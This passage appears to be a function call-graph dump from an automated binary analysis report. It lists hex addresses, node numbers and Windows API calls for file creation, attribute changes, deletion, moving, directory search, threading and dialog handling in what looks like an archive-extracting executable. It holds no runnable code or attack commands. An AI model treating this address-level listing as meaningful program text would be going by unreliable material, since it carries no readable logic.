25494->25643 25496 dae00c 25496->25451 25502 dae022 UnmapViewOfFile CloseHandle 25496->25502 25497 daea07 121 API calls 25498 dae11e 25497->25498 25582 dafdf7 25498->25582 25499 dadf71 25644 da136b 82 API calls 25499->25644 25502->25451 25503->25496 25507 dadff8 Sleep 25503->25507 25505 dadf82 MapViewOfFile 25505->25506 25506->25478 25507->25496 25507->25503 25512->25353 25512->25376 25650 dad864 PeekMessageW 25514->25650 25517 daf86e SendMessageW SendMessageW 25519 daf8ae 25517->25519 25520 daf8cd SendMessageW SendMessageW SendMessageW 25517->25520 25518 daf836 25521 daf841 ShowWindow SendMessageW SendMessageW 25518->25521 25519->25520 25522 daf901 SendMessageW 25520->25522 25523 daf924 SendMessageW 25520->25523 25521->25517 25522->25523 25524 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 25523->25524 25525 dadd62 25524->25525 25525->25395 25638 daff24 5 API calls 2 library calls 25525->25638 25530 d9bafb 25526->25530 25527 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 25528 d9bbf0 25527->25528 25528->25417 25528->25418 25529 d9bba8 25531 d9bee1 13 API calls 25529->25531 25533 d9bbd0 25529->25533 25530->25529 25532 d9bbf9 25530->25532 25530->25533 25655 d9bee1 25530->25655 25531->25533 25670 db13f9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 25532->25670 25533->25527 25536 d9bbfe 25537->25426 25539 d9b028 25538->25539 25540 d9b096 CreateFileW 25539->25540 25541 d9b08d 25539->25541 25540->25541 25542 d9b0dd 25541->25542 25543 d9da1e 6 API calls 25541->25543 25546 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 25542->25546 25544 d9b0c2 25543->25544 25544->25542 25545 d9b0c6 CreateFileW 25544->25545 25545->25542 25547 d9b111 25546->25547 25547->25481 25547->25482 25548->25456 25549->25468 25550->25485 25552 daea19 25551->25552 25553 daf717 25552->25553 25554 dad5dd 6 API calls 25552->25554 25555 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 25553->25555 25560 daea7c _wcslen _wcsrchr 25554->25560 25556 dae110 25555->25556 25556->25497 25557 dad5dd 6 API calls 25557->25560 25558 daed57 SetWindowTextW 25558->25560 25560->25553 25560->25557 25560->25558 25561 d9dd18 5 API calls 25560->25561 25563 db66ae 22 API calls 25560->25563 25565 daeb4b SetFileAttributesW 25560->25565 25570 dad41c 100 API calls 25560->25570 25573 daf73c 25560->25573 25578 daef75 SendMessageW 25560->25578 25681 dac5dd GetCurrentDirectoryW 25560->25681 25683 d9c3de 11 API calls 25560->25683 25684 d9c367 FindClose 25560->25684 25685 dad76e 76 API calls 3 library calls 25560->25685 25561->25560 25563->25560 25566 daec05 GetFileAttributesW 25565->25566 25581 daeb65 __cftof _wcslen 25565->25581 25566->25560 25569 daec17 DeleteFileW 25566->25569 25569->25560 25571 daec28 25569->25571 25572 daef35 GetDlgItem SetWindowTextW SendMessageW 25570->25572 25576 d94c00 _swprintf 51 API calls 25571->25576 25572->25560 25686 db13f9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 25573->25686 25575 daf741 25577 daec48 GetFileAttributesW 25576->25577 25577->25571 25579 daec5d MoveFileW 25577->25579 25578->25560 25579->25560 25580 daec75 MoveFileExW 25579->25580 25580->25560 25581->25560 25581->25566 25682 d9d8ac 51 API calls 2 library calls 25581->25682 25583 dafe13 25582->25583 25687 da26df 25583->25687 25585 dafe59 25691 d98ddf 25585->25691 25587 dafeb7 25701 d98ff5 25587->25701 25595 daf9f8 25594->25595 25596 dac556 4 API calls 25595->25596 25597 dafa13 25596->25597 25598 dafa1b GetWindow 25597->25598 25599 dafae1 25597->25599 25598->25599 25603 dafa34 25598->25603 25600 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 25599->25600 25601 dae256 25600->25601 25601->25355 25601->25356 25602 dafa41 GetClassNameW 25602->25603 25603->25599 25603->25602 25604 dafac9 GetWindow 25603->25604 25605 dafa65 GetWindowLongW 25603->25605 25604->25599 25604->25603 25605->25604 25606 dafa75 SendMessageW 25605->25606 25606->25604 25607 dafa8b GetObjectW 25606->25607 26251 dac595 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25607->26251 25609 dafaa2 26252 dac574 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25609->26252 26253 dac79c 13 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 25609->26253 25612 dafab3 SendMessageW DeleteObject 25612->25604 25613->25366 25615 dacb99 25614->25615 25616 dacb74 25614->25616 25617 dacb9e SHAutoComplete 25615->25617 25618 dacba7 25615->25618 25616->25615 25620 dacb8b FindWindowExW 25616->25620 25617->25618 25619 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 25618->25619 25621 dacbb2 25619->25621 25620->25615 25622 dad243 25621->25622 25623 dad255 25622->25623 25624 d9147c 43 API calls 25623->25624 25625 dad2af 25624->25625 26254 d920eb 25625->26254 25628 dad2d1 26261 d91b0e 25628->26261 25629 dad2c5 25630 d916b8 86 API calls 25629->25630 25632 dad2cd 25630->25632 25633 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 25632->25633 25634 dad357 25633->25634 25634->25397 25634->25401 25635 dad2ed __InternalCxxFrameHandler ___std_exception_copy 25636 d916b8 86 API calls 25635->25636 25636->25632 25637->25384 25638->25395 25639->25400 25640->25465 25641->25487 25642->25494 25643->25499 25644->25505 25646->25439 25647->25460 25648->25434 25649->25424 25651 dad8b8 GetDlgItem 25650->25651 25652 dad87f GetMessageW 25650->25652 25651->25517 25651->25518 25653 dad8a4 TranslateMessage DispatchMessageW 25652->25653 25654 dad895 IsDialogMessageW 25652->25654 25653->25651 25654->25651 25654->25653 25656 d9beee 25655->25656 25657 d9bf1c 25656->25657 25658 d9bf0f CreateDirectoryW 25656->25658 25659 d9bccb 8 API calls 25657->25659 25658->25657 25660 d9bf4f 25658->25660 25662 d9bf22 25659->25662 25664 d9bf5e 25660->25664 25671 d9c2e5 25660->25671 25661 d9bf62 GetLastError 25661->25664 25662->25661 25665 d9da1e 6 API calls 25662->25665 25666 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 25664->25666 25667 d9bf38 25665->25667 25668 d9bf85 25666->25668 25667->25661 25669 d9bf3c CreateDirectoryW 25667->25669 25668->25530 25669->25660 25669->25661 25670->25536 25672 db1590 25671->25672 25673 d9c2f2 SetFileAttributesW 25672->25673 25674 d9c33f 25673->25674 25675 d9c314 25673->25675 25677 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 25674->25677 25676 d9da1e 6 API calls 25675->25676 25678 d9c326 25676->25678 25679 d9c34d 25677->25679 25678->25674 25680 d9c32a SetFileAttributesW 25678->25680 25679->25664 25680->25674 25681->25560 25682->25581 25683->25560 25684->25560 25685->25560 25686->25575 25688 da26ec _wcslen 25687->25688 25720 d91925 25688->25720 25690 da2704 25690->25585 25692 d98deb __EH_prolog3 25691->25692 25733 d9ee0f 25692->25733 25694 d98e0e 25695 db121c 27 API calls 25694->25695 25696 d98e52 __cftof 25695->25696 25697 db121c 27 API calls 25696->25697 25698 d98e7a 25697->25698 25743 da6b0d 25698->25743 25700 d98eac 25700->25587 25702 d98fff 25701->25702 25703 d99080 25702->25703 25787 d9c37a 25702->25787 25706 d990e5 25703->25706 25764 d996b9 25703->25764 25705 d99127 25708 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 25705->25708 25706->25705 25793 d91407 74 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 25706->25793 25709 d9914e 25708->25709 25711 d98ebb 25709->25711 26242 d9ab26 8 API calls __cftof 25711->26242 25713 d98ee6 25714 d98ef7 Concurrency::cancel_current_task 25713->25714 26243 da4396 25713->26243 25716 d92179 26 API calls 25714->25716 25717 d98f1e 25716->25717 26249 d9eea4 86 API calls Concurrency::cancel_current_task 25717->26249 25721 d91937 25720->25721 25728 d9198f 25720->25728 25722 d91960 25721->25722 25730 d97bad 76 API calls 2 library calls 25721->25730 25724 db66ae 22 API calls 25722->25724 25726 d91980 25724->25726 25725 d91956 25731 d97c32 75 API calls 25725->25731 25726->25728 25732 d97c32 75 API calls 25726->25732 25728->25690 25730->25725 25731->25722 25732->25728 25734 d9ee1b __EH_prolog3 25733->25734 25735 db121c 27 API calls 25734->25735 25736 d9ee59 25735->25736 25738 d9ee6c 25736->25738 25749 d96ae8 25736->25749 25739 db121c 27 API calls 25738->25739 25740 d9ee7d 25739->25740 25741 d96ae8 41 API calls 25740->25741 25742 d9ee90 25740->25742 25741->25742 25742->25694 25744 da6b19 __EH_prolog3 25743->25744 25745 db121c 27 API calls 25744->25745 25746 da6b33 25745->25746 25747 da6b4a 25746->25747 25763 da2f22 80 API calls 25746->25763 25747->25700 25750 d96af4 __EH_prolog3 25749->25750 25755 db15e3 25750->25755 25752 d96b0d 25753 db15e3 41 API calls 25752->25753 25754 d96b2f __cftof 25753->25754 25754->25738 25757 db15ef ___scrt_is_nonwritable_in_current_image 25755->25757 25756 db161a 25756->25752 25757->25756 25759 d96b70 25757->25759 25760 d96b7c __EH_prolog3 25759->25760 25761 da11a5 41 API calls 25760->25761 25762 d96b86 25761->25762 25762->25757 25763->25747 25765 d996d4 25764->25765 25794 d9147c 25765->25794 25767 d996fb 25769 d9970c 25767->25769 25959 d9b982 25767->25959 25772 d99743 25769->25772 25806 d91b63 25769->25806 25771 d9973f 25771->25772 25825 d920a1 142 API calls __EH_prolog3 25771->25825 25951 d916b8 25772->25951 25778 d997e4 25826 d9988e 81 API calls 25778->25826 25780 d997fe 25781 d99842 25780->25781 25827 da3cf2 25780->25827 25781->25772 25830 d9441e 25781->25830 25842 d99906 25781->25842 25782 d9976b 25782->25778 25786 d9c37a 12 API calls 25782->25786 25786->25782 25788 d9c38f 25787->25788 25789 d9c3bd 25788->25789 26229 d9c4a8 25788->26229 25789->25702 25792 d9c3a4 FindClose 25792->25789 25793->25705 25795 d91488 __EH_prolog3 25794->25795 25796 d96ae8 41 API calls 25795->25796 25797 d914a8 25796->25797 25798 d9ee0f 41 API calls 25797->25798 25799 d914b7 25798->25799 25800 db121c 27 API calls 25799->25800 25803 d9152b 25799->25803 25802 d91518 25800->25802 25802->25803 25963 d9668f 25802->25963 25971 d9cc45 25803->25971 25805 d915b3 __cftof 25805->25767 25808 d91b6f __EH_prolog3 25806->25808 25807 d91cef 25807->25771 25808->25807 25812 d91bbc 25808->25812 25993 d9145d 25808->25993 25811 d91d21 25996 d91407 74 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 25811->25996 25812->25807 25812->25811 25815 d91d2e 25812->25815 25814 d9441e 116 API calls 25816 d91d6c 25814->25816 25815->25807 25815->25814 25817 d91db4 25816->25817 25820 d9441e 116 API calls 25816->25820 25817->25807 25818 d91de7 25817->25818 25997 d91407 74 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 25817->25997 25818->25807 25823 d9b8c0 79 API calls 25818->25823 25820->25816 25821 d9441e 116 API calls 25822 d91e38 25821->25822 25822->25807 25822->25821 25823->25822 25824 d9b8c0 79 API calls 25824->25812 25825->25782 25826->25780 26011 db029f 25827->26011 25831 d9442a 25830->25831 25832 d9442e 25830->25832 25831->25781 25841 d9b8c0 79 API calls 25832->25841 25833 d94440 25834 d94469 25833->25834 25835 d9445b 25833->25835 26022 d92fcb 116 API calls 3 library calls 25834->26022 25838 d9449b 25835->25838 26021 d93ab7 104 API calls 3 library calls 25835->26021 25838->25781 25839 d94467 25839->25838 26023 d925f4 74 API calls 25839->26023 25841->25833 25843 d99918 25842->25843 25847 d9997a 25843->25847 25874 d99da2 Concurrency::cancel_current_task 25843->25874 26069 daab94 117 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 25843->26069 25844 d9a820 25848 d9a86c 25844->25848 25849 d9a825 25844->25849 25846 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 25850 d9a862 25846->25850 25847->25844 25852 d9999b 25847->25852 25847->25874 25848->25874 26111 daab94 117 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 25848->26111 25849->25874 26110 d98c06 166 API calls 25849->26110 25850->25781 25852->25874 26024 d96936 25852->26024 25855 d99a71 26030 d9d63a 25855->26030 25857 d99bba 25863 d99ce2 25857->25863 25857->25874 26072 d99582 38 API calls 25857->26072 25859 d99aa4 25859->25857 26070 d9bf89 57 API calls 4 library calls 25859->26070 25865 d9c37a 12 API calls 25863->25865 25868 d99d40 25863->25868 25864 d99c24 26071 db9ea8 26 API calls 2 library calls 25864->26071 25865->25868 25867 d9a0ac 26081 d9f014 97 API calls 25867->26081 26034 d98f84 25868->26034 25871 d99dd1 25880 d99e33 25871->25880 26073 d94916 41 API calls 2 library calls 25871->26073 25874->25846 25875 d9a004 25876 d9a0c3 25875->25876 25883 d9a033 25875->25883 25882 d9a118 25876->25882 25889 d9a0ce 25876->25889 25878 d99f78 Concurrency::cancel_current_task 25878->25875 26079 d9bd61 50 API calls 3 library calls 25878->26079 25880->25874 25880->25878 25892 d99f71 25880->25892 26074 d98db7 41 API calls 25880->26074 26075 d9f014 97 API calls 25880->26075 26076 d9240a 74 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 25880->26076 26077 d9953f 98 API calls 25880->26077 25881 d9a174 25887 d9a1e2 25881->25887 25939 d9a7d9 25881->25939 26084 d9b288 25881->26084 25895 d9a09b 25882->25895 26083 d993ac 119 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 25882->26083 25883->25881 25885 d9bccb 8 API calls 25883->25885 25883->25895 25884 d9af2f 80 API calls 25884->25874 25890 d9a068 25885->25890 25886 d9af2f 80 API calls 25886->25874 26040 d9c94d 25887->26040 25891 d9a116 25889->25891 26082 d99155 123 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 25889->26082 25890->25895 26080 d9ac09 97 API calls 25890->26080 25891->25884 26078 d9240a 74 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 25892->26078 25895->25881 25895->25891 25898 d9a231 25902 d9c94d 27 API calls 25898->25902 25917 d9a247 25902->25917 25904 d9a1d0 26088 d97e45 77 API calls 25904->26088 25906 d9a31d 25907 d9a37c 25906->25907 25908 d9a511 25906->25908 25909 d9a43c 25907->25909 25912 d9a394 25907->25912 25910 d9a523 25908->25910 25911 d9a537 25908->25911 25931 d9a3b5 25908->25931 25916 d9d63a 5 API calls 25909->25916 26095 d9ab81 25910->26095 26044 da53f0 25911->26044 25914 d9a3db 25912->25914 25923 d9a3a3 25912->25923 25914->25931 26091 d988a9 112 API calls 25914->26091 25921 d9a466 25916->25921 25917->25906 25918 d9a2f4 25917->25918 25928 d9b1e6 79 API calls 25917->25928 25918->25906 26089 d9b427 82 API calls 25918->26089 25919 d9a550 26054 da5099 25919->26054 26092 d99582 38 API calls 25921->26092 26090 d9240a 74 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 25923->26090 25926 d9a502 25926->25781 25928->25918 25930 d9a47e 25930->25931 25932 d9a4ab 25930->25932 25933 d9a494 25930->25933 25931->25926 25936 d9a5c5 25931->25936 26106 d9c905 5 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 25931->26106 26094 d9a8b9 103 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 25932->26094 26093 d985fc 86 API calls 25933->26093 25940 d9a656 25936->25940 26107 d9240a 74 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 25936->26107 25938 d9a764 25938->25939 25941 d9c2e5 8 API calls 25938->25941 25939->25886 25940->25938 25940->25939 25942 d9a712 25940->25942 26063 d9b949 SetEndOfFile 25940->26063 25945 d9a7bf 25941->25945 26064 d9b7e2 25942->26064 25945->25939 26108 d9240a 74 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 25945->26108 25946 d9a759 25948 d9afd0 77 API calls 25946->25948 25948->25938 25949 d9a7cf 26109 d97d49 76 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 25949->26109 25952 d916ca 25951->25952 25954 d916dc Concurrency::cancel_current_task 25951->25954 25952->25954 26223 d91729 25952->26223 25955 d92179 26 API calls 25954->25955 25956 d9170b 25955->25956 26226 d9eea4 86 API calls Concurrency::cancel_current_task 25956->26226 25960 d9b999 25959->25960 25961 d9b9a3 25960->25961 26228 d97c87 78 API calls 25960->26228 25961->25769 25964 d9669b __EH_prolog3 25963->25964 25979 d9d467 GetCurrentProcess GetProcessAffinityMask 25964->25979 25966 d966a5 25967 da11a5 41 API calls 25966->25967 25968 d966fc 25967->25968 25980 d968b3 GetCurrentProcess GetProcessAffinityMask 25968->25980 25970 d96719 25970->25803 25972 d9cc65 __cftof 25971->25972 25981 d9cb21 25972->25981 25977 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 25978 d9cc95 25977->25978 25978->25805 25979->25966 25980->25970 25988 d9cb02 25981->25988 25983 d9cb96 25984 d92179 25983->25984 25985 d92193 25984->25985 25986 d92184 25984->25986 25985->25977 25992 d913db 26 API calls Concurrency::cancel_current_task 25986->25992 25989 d9cb0b 25988->25989 25991 d9cb10 25988->25991 25990 d92179 26 API calls 25989->25990 25990->25991 25991->25983 25992->25985 25998 d918b2 25993->25998 25996->25807 25997->25818 25999 d918c4 25998->25999 26005 d91476 25998->26005 26000 d918ed 25999->26000 26008 d97bad 76 API calls 2 library calls 25999->26008 26002 db66ae 22 API calls 26000->26002 26006 d9190a 26002->26006 26003 d918e3 26009 d97c32 75 API calls 26003->26009 26005->25824 26006->26005 26010 d97c32 75 API calls 26006->26010 26008->26003 26009->26000 26010->26005 26012 db02ac 26011->26012 26013 da0597 53 API calls 26012->26013 26014 db02da 26013->26014 26015 d94c00 _swprintf 51 API calls 26014->26015 26016 db02ec 26015->26016 26017 daf7fc 21 API calls 26016->26017 26018 db02fd 26017->26018 26019 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 26018->26019 26020 da3d08 26019->26020 26020->25781 26021->25839 26022->25839 26023->25838 26025 d96946 26024->26025 26112 d96852 26025->26112 26027 d96979 26029 d969b1 26027->26029 26117 d9d122 6 API calls 3 library calls 26027->26117 26029->25855 26033 d9d644 26030->26033 26031 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 26032 d9d7d8 26031->26032 26032->25859 26033->26031 26035 d98f99 26034->26035 26036 d98fd1 26035->26036 26128 d97e25 74 API calls 26035->26128 26036->25867 26036->25871 26036->25874 26038 d98fc9 26129 d91407 74 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 26038->26129 26041 d9c95b 26040->26041 26043 d9c965 26040->26043 26042 db121c 27 API calls 26041->26042 26042->26043 26043->25898 26045 da5405 26044->26045 26047 da540f ___std_exception_copy 26044->26047 26130 d97c32 75 API calls 26045->26130 26048 da553f 26047->26048 26049 da5495 26047->26049 26053 da54b9 __cftof 26047->26053 26132 db47d0 RaiseException 26048->26132 26131 da5323 75 API calls 3 library calls 26049->26131 26052 da556b 26053->25919 26055 da50a2 26054->26055 26057 da50cb 26054->26057 26056 da50bf 26055->26056 26059 da50c1 26055->26059 26061 da50b7 26055->26061 26056->25931 26057->26056 26149 da7576 137 API calls 2 library calls 26057->26149 26148 da8250 132 API calls 26059->26148 26133 da8c7e 26061->26133 26063->25942 26065 d9b7f3 26064->26065 26068 d9b802 26064->26068 26066 d9b7f9 FlushFileBuffers 26065->26066 26065->26068 26066->26068 26067 d9b87f SetFileTime 26067->25946 26068->26067 26069->25847 26070->25864 26071->25857 26072->25863 26073->25880 26074->25880 26075->25880 26076->25880 26077->25880 26078->25878 26079->25875 26080->25895 26081->25878 26082->25891 26083->25895 26085 d9a1ba 26084->26085 26086 d9b291 GetFileType 26084->26086 26085->25887 26087 d9240a 74 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 26085->26087 26086->26085 26087->25904 26088->25887 26089->25906 26090->25931 26091->25931 26092->25930 26093->25931 26094->25931 26096 d9ab8d __EH_prolog3 26095->26096 26219 d98fdb 26096->26219 26099 d9145d 78 API calls 26100 d9ab9b 26099->26100 26101 d9f0d7 132 API calls 26100->26101 26102 d9abae 26101->26102 26103 d9abf6 26102->26103 26105 d9f0d7 132 API calls 26102->26105 26222 d9f2c3 97 API calls __InternalCxxFrameHandler 26102->26222 26103->25931 26105->26102 26106->25936 26107->25940 26108->25949 26109->25939 26110->25874 26111->25874 26118 d96731 26112->26118 26114 d96873 26114->26027 26116 d96731 6 API calls 26116->26114 26117->26027 26119 d9673b 26118->26119 26120 d9d63a 5 API calls 26119->26120 26126 d96765 26120->26126 26121 d96833 26122 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 26121->26122 26123 d96845 26122->26123 26123->26114 26123->26116 26124 d9d63a 5 API calls 26124->26126 26126->26121 26126->26124 26127 d9d122 6 API calls 3 library calls 26126->26127 26127->26126 26128->26038 26129->26036 26130->26047 26131->26053 26132->26052 26150 da5617 26133->26150 26136 da90ae 26178 da725b 98 API calls __InternalCxxFrameHandler 26136->26178 26138 da90be __InternalCxxFrameHandler 26139 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 26138->26139 26140 da9108 26139->26140 26140->26056 26141 da8c9d __InternalCxxFrameHandler 26141->26136 26156 d9f0d7 26141->26156 26167 da306d 26141->26167 26173 da5e86 132 API calls 26141->26173 26174 da9111 132 API calls 26141->26174 26175 da32af 81 API calls 26141->26175 26176 da5991 98 API calls __InternalCxxFrameHandler 26141->26176 26177 da976f 137 API calls __InternalCxxFrameHandler 26141->26177 26148->26056 26149->26056 26152 da5623 __EH_prolog3 __cftof 26150->26152 26151 da5709 26151->26141 26152->26151 26153 db15e3 41 API calls 26152->26153 26154 da56a0 __cftof ___std_exception_copy 26152->26154 26153->26154 26154->26151 26179 d97c32 75 API calls 26154->26179 26163 d9f0ed __InternalCxxFrameHandler 26156->26163 26157 d9f25d 26158 d9f291 26157->26158 26180 d9f08e 26157->26180 26160 d9f2b2 26158->26160 26186 d96c92 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 26158->26186 26187 da2ee4 26160->26187 26163->26157 26165 d9f254 26163->26165 26184 d9ca4c 91 API calls __EH_prolog3 26163->26184 26185 daab94 117 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 26163->26185 26165->26141 26168 da3079 26167->26168 26169 da307e 26167->26169 26203 da3105 26168->26203 26171 da308e 26169->26171 26211 da32af 81 API calls 26169->26211 26171->26141 26173->26141 26174->26141 26175->26141 26176->26141 26177->26141 26178->26138 26179->26154 26181 d9f0d3 26180->26181 26182 d9f096 26180->26182 26181->26158 26182->26181 26193 da3ca6 26182->26193 26184->26163 26185->26163 26186->26160 26188 da2eeb 26187->26188 26189 da2f06 26188->26189 26201 d97ba8 RaiseException std::_Xinvalid_argument 26188->26201 26191 da2f17 SetThreadExecutionState 26189->26191 26202 d97ba8 RaiseException std::_Xinvalid_argument 26189->26202 26191->26165 26196 db017f 26193->26196 26197 da22ef 26196->26197 26198 db0196 SendDlgItemMessageW 26197->26198 26199 dad864 PeekMessageW GetMessageW IsDialogMessageW TranslateMessage DispatchMessageW 26198->26199 26200 da3cc6 26199->26200 26200->26181 26201->26189 26202->26191 26207 da3110 26203->26207 26208 da317e 26203->26208 26204 da3115 CreateThread 26204->26207 26215 da3240 26204->26215 26206 da316d SetThreadPriority 26206->26207 26207->26204 26207->26206 26207->26208 26212 d97bad 76 API calls 2 library calls 26207->26212 26213 d97d49 76 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 26207->26213 26214 d97ba8 RaiseException std::_Xinvalid_argument 26207->26214 26208->26169 26211->26171 26212->26207 26213->26207 26214->26207 26218 da324e 84 API calls 26215->26218 26217 da3249 26218->26217 26220 d9d076 6 API calls 26219->26220 26221 d98fe0 26220->26221 26221->26099 26222->26102 26227 d92155 26 API calls Concurrency::cancel_current_task 26223->26227 26225 d91737 26227->26225 26228->25961 26230 d9c4b2 26229->26230 26231 d9c548 FindNextFileW 26230->26231 26232 d9c4e5 FindFirstFileW 26230->26232 26234 d9c553 GetLastError 26231->26234 26241 d9c52d 26231->26241 26233 d9c4f2 26232->26233 26232->26241 26235 d9da1e 6 API calls 26233->26235 26234->26241 26236 d9c505 26235->26236 26237 d9c509 FindFirstFileW 26236->26237 26238 d9c522 GetLastError 26236->26238 26237->26238 26237->26241 26238->26241 26239 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 26240 d9c39f 26239->26240 26240->25789 26240->25792 26241->26239 26242->25713 26244 da43a0 26243->26244 26245 da43b9 26244->26245 26248 da43cd 26244->26248 26250 da2fc9 86 API calls 26245->26250 26247 da43c0 Concurrency::cancel_current_task 26247->26248 26250->26247 26251->25609 26252->25609 26253->25612 26255 d9b982 78 API calls 26254->26255 26256 d920f7 26255->26256 26257 d91b63 116 API calls 26256->26257 26260 d92114 26256->26260 26258 d92104 26257->26258 26258->26260 26265 d91407 74 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 26258->26265 26260->25628 26260->25629 26262 d91b1e 26261->26262 26264 d91b1a 26261->26264 26266 d91a55 26262->26266 26264->25635 26265->26260 26267 d91a67 26266->26267 26268 d91aa4 26266->26268 26269 d9441e 116 API calls 26267->26269 26274 d948bd 26268->26274 26272 d91a87 26269->26272 26272->26264 26276 d948c6 26274->26276 26275 d9441e 116 API calls 26275->26276 26276->26275 26277 da2ee4 2 API calls 26276->26277 26278 d91ac5 26276->26278 26277->26276 26278->26272 26279 d91fb0 26278->26279 26280 d91fbc __EH_prolog3 26279->26280 26291 d944ab 26280->26291 26283 d918b2 78 API calls 26284 d91ff0 26283->26284 26323 d9199b 78 API calls 26284->26323 26285 d92060 26285->26272 26287 d92008 26289 d92014 _wcslen 26287->26289 26324 da3d10 MultiByteToWideChar 26287->26324 26325 d9199b 78 API calls 26289->26325 26292 d944c6 26291->26292 26293 d94510 26292->26293 26294 d944f4 26292->26294 26296 d9476a 26293->26296 26299 d9453c 26293->26299 26326 d91407 74 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 26294->26326 26332 d91407 74 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 26296->26332 26298 d944ff 26300 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 26298->26300 26299->26298 26302 da53f0 75 API calls 26299->26302 26301 d91fdf 26300->26301 26301->26283 26301->26285 26307 d94589 26302->26307 26303 d945bb 26304 d94646 26303->26304 26322 d945b2 26303->26322 26329 d9f014 97 API calls 26303->26329 26306 d9c94d 27 API calls 26304->26306 26305 d945b7 26305->26303 26328 d925da 78 API calls 26305->26328 26310 d94659 26306->26310 26307->26303 26307->26305 26308 d945a7 26307->26308 26327 d91407 74 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 26308->26327 26314 d946f2 26310->26314 26315 d946e2 26310->26315 26312 da4396 86 API calls 26312->26298 26317 da5099 137 API calls 26314->26317 26316 d9ab81 137 API calls 26315->26316 26318 d946f0 26316->26318 26317->26318 26330 d9c905 5 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 26318->26330 26320 d9472a 26320->26322 26331 d9240a 74 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 26320->26331 26322->26312 26323->26287 26324->26289 26325->26285 26326->26298 26327->26322 26328->26303 26329->26304 26330->26320 26331->26322 26332->26298 26560 d91890 86 API calls Concurrency::cancel_current_task 26562 d91095 44 API calls 26352 db0a8e 26353 db0a55 26352->26353 26353->26352 26354 db0d3a ___delayLoadHelper2@8 14 API calls 26353->26354 26354->26353 26636 dbe680 GetProcessHeap 26638 dbaaba 55 API calls _free 26497 d9d4bd 26498 d9d4cf __cftof 26497->26498 26501 da31c2 26498->26501 26504 da3184 GetCurrentProcess GetProcessAffinityMask 26501->26504 26505 d9d526 26504->26505 26566 db00b3 DialogBoxParamW 26510 dbbab0 26518 dbd3ff 26510->26518 26514 dbbacc 26515 dbbad9 26514->26515 26526 dbbae0 11 API calls 26514->26526 26517 dbbac4 26519 dbd2e8 __dosmaperr 5 API calls 26518->26519 26520 dbd426 26519->26520 26521 dbd43e TlsAlloc 26520->26521 26522 dbd42f 26520->26522 26521->26522 26523 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 26522->26523 26524 dbbaba 26523->26524 26524->26517 26525 dbba29 20 API calls 2 library calls 26524->26525 26525->26514 26526->26517 26527 d910b5 26528 d9668f 43 API calls 26527->26528 26529 d910ba 26528->26529 26532 db1932 29 API calls 26529->26532 26531 d910c4 26532->26531 26536 db10a8 26537 db10b2 26536->26537 26538 db0d3a 